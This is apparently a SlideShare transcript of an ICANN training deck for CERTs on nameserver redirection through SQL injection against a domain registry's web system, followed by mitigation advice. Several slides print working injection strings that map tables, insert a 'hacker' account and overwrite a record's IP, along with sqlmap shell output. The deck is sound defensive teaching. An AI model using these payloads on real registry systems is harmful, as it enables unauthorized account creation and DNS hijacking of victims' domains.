Day 2 Dns Cert 4b Name Server Redirection


Published on

Presentation by ICANN

Published in: Technology
  • Be the first to comment

  • Be the first to like this

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Day 2 Dns Cert 4b Name Server Redirection

  1. 1. DNS Security for CERTs - Attack Scenarios & Demonstrations – NameServer Redirection Chris Evans Delta Risk, LLC 7 March 2010 1
  2. 2. What You Will Need for the Exercise • Please Watch the Live Demonstration in Front – We will be targeting the web registry system • You may need your Ubuntu VM to: – Prior to attack, verify the Web Registry System URL: http://www.tld1 points to – After attack, determine where http://www.tld1 points to 2
  3. 3. Description – NameServer Redirection • Change of Registration or Delegation Data – Intentional • Disgruntled employee changes registry data • Outsiders pretending to be a customer request an “update” to their account • Hackers change the registry database directly through web attacks – Accidental • Untrained employee • Typos in registry data Domain1 NS Domain2 NS Domain3 NS -> Attacker now controls resolutions for Domain3 3
  4. 4. Case Study • SQL Injection Top List of Data Breach Attacks – SQL Injection used in 60% of all data breach attacks, 19% of all security breaches on the Internet – Insecure programming techniques combined with proliferation of web based application = trouble – Increase in automated techniques to detect and exploit vulnerabilities = double trouble 4
  5. 5. Case Study • Summer of 2009, several African & Pacific ccTLD web-based registry systems were attacked through SQL injection – Attackers created new user accounts within the system – These accounts were used to modify existing registrations and re-delegate sites to malicious content 5
  6. 6. Attack Demonstration Your website is designed to perform a query during a valid login attempt: SELECT * FROM table WHERE username=‘mike’ AND password=‘!QAZ2wsx’ SQL Injection …. Well…. Injects SQL statements into your backend database query: New SQL statement injected…. SELECT * FROM table WHERE username=‘mike‘; INSERT hacker INTO database …original SQL statement gets commented out “--” 6
  7. 7. Demonstration – Attacker View One single ‘ nets: table name and two variables ' group by srs_users.username having 1=1-- Reconaisance & Table Mapping... ';insert into srs_users values(101,'hacker','password')-- Adds user hacker to the database……. 7
  8. 8. Demonstration – Attacker View (cont.) Use SQL Injection tool to gain a shell to the database <SQL-map>: sql-shell> select * from srs_regs where fqdn='rogue.tld1' do you want to retrieve the SQL statement output? [Y/n] y [15:15:56] [INFO] fetching SQL SELECT statement query output: 'select * from srs_regs where fqdn='rogue.tld1'' [15:15:56] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself [15:15:56] [WARNING] on PostgreSQL it is only possible to enumerate on the current schema and on system databases, sqlmap is going to use 'public' schema as database name [15:15:56] [INFO] fetching columns for table 'srs_regs' on database 'public' [15:15:56] [INFO] fetching number of columns for table 'srs_regs' on database 'public' [15:15:56] [INFO] retrieved: 9 [15:15:57] [INFO] retrieved: regid [15:15:59] [INFO] retrieved: type [15:16:01] [INFO] retrieved: fqdn Enumerating the Database… [15:16:03] [INFO] retrieved: ns [15:16:04] [INFO] retrieved: ip [15:16:06] [INFO] retrieved: recordtype [15:16:10] [INFO] retrieved: hostname [15:16:14] [INFO] retrieved: ownerid [15:16:17] [INFO] retrieved: parentid …then update a record with bad IP… '; update srs_regs set (ip)=('') where regid = 1 -- 8
  9. 9. Demonstration – Server View 9
  10. 10. Demonstration – User View ; <<>> DiG 9.5.1-P2 <<>> www.tld1 1 ;; global options: printcmd One minute ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23392 you get the ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0 correct IP and ;; QUESTION SECTION: website… ;www.tld1. IN A ;; ANSWER SECTION: www.tld1. 180 IN A ;; AUTHORITY SECTION: ; <<>> DiG 9.5.1-P2 <<>> www.tld1 2 ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23392 …the next ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0 you’re browsing ;; QUESTION SECTION: whatever the ;www.tld1. IN A hacker wants ;; ANSWER SECTION: www.tld1. 180 IN A you to! ;; AUTHORITY SECTION: 10
  11. 11. Impact • Registry suffers public relations hit, potential loss of customers & revenue • Loss of brand reputation, customers, or revenue for registrants who are victimized • Effect of attack persists even after detection and mitigation because of TTLs 11
  12. 12. Mitigation & Response Strategies • SQL Injection – Practice secure coding principles in any web-based application that has database connectivity – Validate input and prevent “magic characters” – Use an Web Application Firewall to filter/validate the input to your web application – Use database logging to track queries and the pages they are being run on. – Frequently audit your web applications (not just the systems they run on!) 12
  13. 13. Mitigation & Response Strategies • Nameserver Redirection – Multi-factor authentication of changes – Out-of-band check of changes (e.g. phone, in-person) – Domain “locks” which prevent updates unless manually approved – Validation of changes before publishing new zone files – Processes for contacting ISPs to “clear” cached entries – Automated, continuous validation of published data with automated alerting – Also see ICANN SSAC Report SAC040 13
  14. 14. Mitigation & Response Strategies • Information Sharing – if you’re the victim of an attack – share the details of the attack within the community – you may prevent someone else from becoming a victim A trusted entity, CERTs can encourage this type of exchange within their communities 14
  15. 15. Questions? ? 15